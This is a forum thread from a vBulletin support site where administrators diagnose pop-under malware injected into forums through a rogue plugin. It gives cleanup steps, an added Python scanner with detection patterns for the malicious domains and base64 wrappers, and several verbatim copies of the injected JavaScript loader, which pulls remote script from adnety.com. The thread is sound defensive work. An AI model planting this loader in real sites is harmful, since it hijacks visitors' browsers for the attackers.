Pop Unders with false click..!


socialteenz
10-11-2016, 07:27 PM
So, basically I have been noticing many vB forums affected by this pop-under malware..

What happens is, when you click on your site, the pop-under appears and it redirects you to these sites..

adnety.com
clicknety.com
namefuze.com

Affected vBulletin Sites so far..

http://www.neogaf.com/forum/showthread.php?t=1229205&page=28

http://www.tsptalk.com/mb/report-problems/26162-pop-ups-anyone-still-seeing-them.html

http://www.contractortalk.com/f45/virus-pop-up-301393/

https://forums.rajah.com/showthread.php?151343-Pop-ups


FIX:


Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

Best Practices...


1) Run Suspect File Diagnostics under Maintenance -> Diagnostics. Replace any files not containing the expected contents. Delete any files that are not part of vBulletin and that you can't identify as belonging to your addons.

2) Check your plugins list for any that are not part of a product you've added:

AdminCP > Plugins & Products > Plugin Manager

Any listed under 'vBulletin' at the top of the list should be examined carefully and removed if you're unsure as to what they are.

3) Check your plugins for any base64 code. I recommend against using any plugins or products that include base64 code in them. However, some "lite" or branded addons will include this as a means to prevent you from cheating the author. You'll have to make a personal call on these if you use them. This is often a sign of a hacked site.

4) Update the following passwords in addition to your AdminCP:

- FTP
- Database

When updating the database password, ensure you also change your config.php file to use the new password otherwise your site won't be able to connect to the database.

5) Secure your AdminCP directory via .htaccess/.htpasswd.

Credits: Trevor Hannant

TheLastSuperman
10-11-2016, 07:33 PM
More than likely hidden in a file, called via referencing a URL... could or could not be in base64 format, i.e. encrypted per se; from reading, heck, not sure, will know more once I run into this first-hand, as with all this crud these terd-nuggets (hacker folks) come up with :p.

socialteenz
10-11-2016, 07:35 PM
Update:

The temporary fix for this issue is to disable the plugin system.

define('DISABLE_HOOKS', true);

TheLastSuperman
10-11-2016, 07:40 PM
This code is at the top of two of your sites listed, I'd check for that on the site you have access to.

On one site:
<script type="text/javascript">
var win = [];
win['webid'] = '22357fb864e954c229';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>

From a completely different site, similar code:
<script type="text/javascript">
var win = [];
win['webid'] = '78557fb86330ee36940';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() {
var pGTP = document.createElement('script'); pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp);
})();
</script>
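An added example, not code from any post in this thread: a small scanner that checks site files for the indicators shown above (the adnety.com loader and its win['webid'] line) and for the eval/base64_decode wrappers that step 3 of the fix warns about. The sample strings and the webid value in them are constructed; the domain names are the ones named in the thread.

```python
import re
from pathlib import Path

# Indicators taken from the thread: the injected loader references adnety.com and
# sets win['webid']; the fix steps warn about base64-encoded plugin code.
INJECTED_SCRIPT_DOMAINS = ("adnety.com", "clicknety.com", "namefuze.com")
WEBID_PATTERN = re.compile(r"win\['webid'\]\s*=\s*'[0-9a-f]+'")
# eval(base64_decode(...)) and friends are the usual shape of hidden plugin code
OBFUSCATION_PATTERN = re.compile(
    r"(?:eval|gzinflate|gzuncompress|str_rot13)\s*\(\s*base64_decode\s*\(", re.I)
# a very long base64 literal is worth a manual look even without an eval() wrapper
BASE64_BLOB = re.compile(r"['\"][A-Za-z0-9+/]{200,}={0,2}['\"]")


def scan_text(text, label="<string>"):
    """Return a list of (label, reason) tuples for anything suspicious in text."""
    findings = []
    lowered = text.lower()
    for domain in INJECTED_SCRIPT_DOMAINS:
        if domain in lowered:
            findings.append((label, f"references {domain}"))
    if WEBID_PATTERN.search(text):
        findings.append((label, "pop-under loader signature (win['webid'])"))
    if OBFUSCATION_PATTERN.search(text):
        findings.append((label, "eval/base64_decode wrapper"))
    if BASE64_BLOB.search(text):
        findings.append((label, "long base64 literal"))
    return findings


def scan_tree(root, suffixes=(".php", ".js", ".html", ".htm")):
    """Walk a site directory and scan every file with one of the given suffixes."""
    root = Path(root)
    findings = []
    for path in sorted(root.rglob("*")):
        if path.is_file() and path.suffix.lower() in suffixes:
            text = path.read_text(encoding="utf-8", errors="replace")
            findings.extend(scan_text(text, str(path.relative_to(root))))
    return findings


# Constructed sample modelled on the loader quoted in the thread (webid is made up).
SAMPLE_INJECTED = """<script type="text/javascript">
var win = [];
win['webid'] = 'deadbeef0123456789';
(function() { var pGTP = document.createElement('script');
pGTP.src = 'https://adnety.com/dashboard/call.js'; })();
</script>"""
SAMPLE_CLEAN = "<?php\n$db = vB::getDbInstance();\n"  # constructed, benign

if __name__ == "__main__":
    for label, reason in scan_text(SAMPLE_INJECTED, "sample"):
        print(label, reason)
```

The same scan_text() can be run over the phpcode of each row in vBulletin's plugin table, which is where step 2 above tells you to look for rogue entries under the 'vBulletin' product.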

socialteenz
10-11-2016, 07:51 PM
The site which I have access to is undergoing a server update; I will get you the details once it's done.

This was the code found on their site..

<script type="text/javascript">
var win = [];
win['webid'] = '46157fb85796a03666';
win['traffic'] = '0';
win['raw'] = '2';
win['pop'] = '0';
(function() { var pGTP = document.createElement('script');
pGTP.type = 'text/javascript'; pGTP.async = true;
var selectGtp = document.getElementsByTagName('script')[0];
pGTP.src = 'https://adnety.com/dashboard/call.js';
selectGtp.parentNode.insertBefore(pGTP, selectGtp); })(); </script>

TheLastSuperman
10-11-2016, 07:53 PM
Looks identical to the ones I also found, so look for how that was added or injected, what is in that area of the page on the back-end of the site? A Hook location or what? Trace it down that way ;). Also once removed check in a day or so and one solid week after to ensure it wasn't added again i.e. shell script left on the site OR code in a file that allows the code to be re-inserted etc etc.

While I find this interesting I'm terribly busy today so I may not be back to comment again for a few hours, catch up is my name at the moment (lol).

socialteenz
10-11-2016, 07:56 PM
Sure, thanks for the info.

I am super sleepy as well; it's 3:25 AM on my side of the world.

Trevor Hannant
10-12-2016, 08:21 AM
Generally, we've found these have been caused by a rogue plugin installed under the 'vBulletin' product. Anyone else with this issue should check there in the first instance and delete it if there is one.

socialteenz
10-12-2016, 06:57 PM
Yup, right on.

Thanks.